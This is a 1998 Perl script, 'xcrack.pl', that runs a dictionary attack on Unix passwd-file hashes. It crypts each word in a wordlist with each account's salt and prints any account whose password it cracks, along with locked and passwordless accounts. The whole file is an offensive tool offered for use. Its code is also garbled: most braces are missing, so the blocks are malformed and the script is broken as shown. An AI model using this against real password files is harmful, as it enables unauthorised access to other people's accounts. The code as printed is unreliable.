 # ------------------------------------------------------------------
#        xcrack.pl -- Unix/Linux Password Cracker -- V1.00
#           By manicx -- 22nd Dec 98 -- email from site
#       Get the latest from http://www.infowar.co.uk/manicx
#          usage = perl xcrack.pl PASSWORDFILE WORDFILE
#       ---------------------------------------------------
#            works under Windows all *nix i can find
#       ---------------------------------------------------
# Updates: Now split into subs and read entire wordfile into an 
# array for extra speed plus breaks out of compare loop now on 
# password crack. Also it will now check for disabled accounts and
# non-passworded accounts 
# This will probably be the last version of this.
# I'll be moving to sockets now, look out on the site above.

# start xcrack.pl

#system("cls");    # This will clear the terminal/Dos screen
                  # Then stick this info on the screen
print ("\n \t\t-------------------------------");     
print ("\n \t\t\t Xcrack  V1.00");
print ("\n \t\thttp://www.infowar.co.uk/manicx");
print ("\n \t\t-------------------------------\n");

if ($#ARGV < 1) {
  usage(); # Print simple statement how to use program if no arguments

$passlist = $ARGV[0];     # Our password File
$wordlist = $ARGV[1];     # Our word list
# ------------- Main Start ---------------------------------
getwordlist();          # getting all words into array
getpasslist();          # getting login and password
print ("\n\tFinished - ", $wordlist, " - Against - ", $passlist);
sub getpasslist{
open (PWD, $passlist) or die (" No Good Name for password File ", $passlist, "\n");
while (<PWD>)
   ($fname, $encrypted, $uid, $gid, $cos, $home, $shell) = split ( /:/);
    if ($encrypted eq "\*")     # Check if the account is Locked 
                     print "Account :", $fname, "   \t ------ Disabled\n";
                     next;     # Skip to next read
    if ($encrypted eq "x")     # Check if the account is Locked 
                     print "Account :", $fname, "   \t ------ Disabled\n";
                     next;     # Skip to next read
    if ($encrypted eq "")      # Check if the account has No Password
                     print "Account :", $fname, "   \t ------ No Password\n";
                     next;     # Skip to next read
    enccompare();              # Call on next Sub
  close (PWD);  #closes the password file
sub getwordlist{
open (WRD, $wordlist) or die (" No Good Name for wordfile ", $wordlist, "\n");
     while (<WRD>)
         @tmp_array = split;              # Getting the entire contents of our
         push @word_array, [@tmp_array];  # word file and stuffing it in here
close (WRD);  #closes the wordlist
sub enccompare{
for $password ( @word_array)
      { $encword = crypt (@$password[0], $encrypted); # encrypt our word with the same salt
        if ($encword eq $encrypted)                   # as the encrypted password   
           print "Account :",$fname, "    \t ------ \aPassword : ", @$password[0], "\n";
           last;     # Print the account name and password if broken then break loop
sub usage { print "usage = perl xcrack.pl PASSWORDFILE WORDFILE\n"; }
# End xcrack.pl    # simple usage if no #ARGV's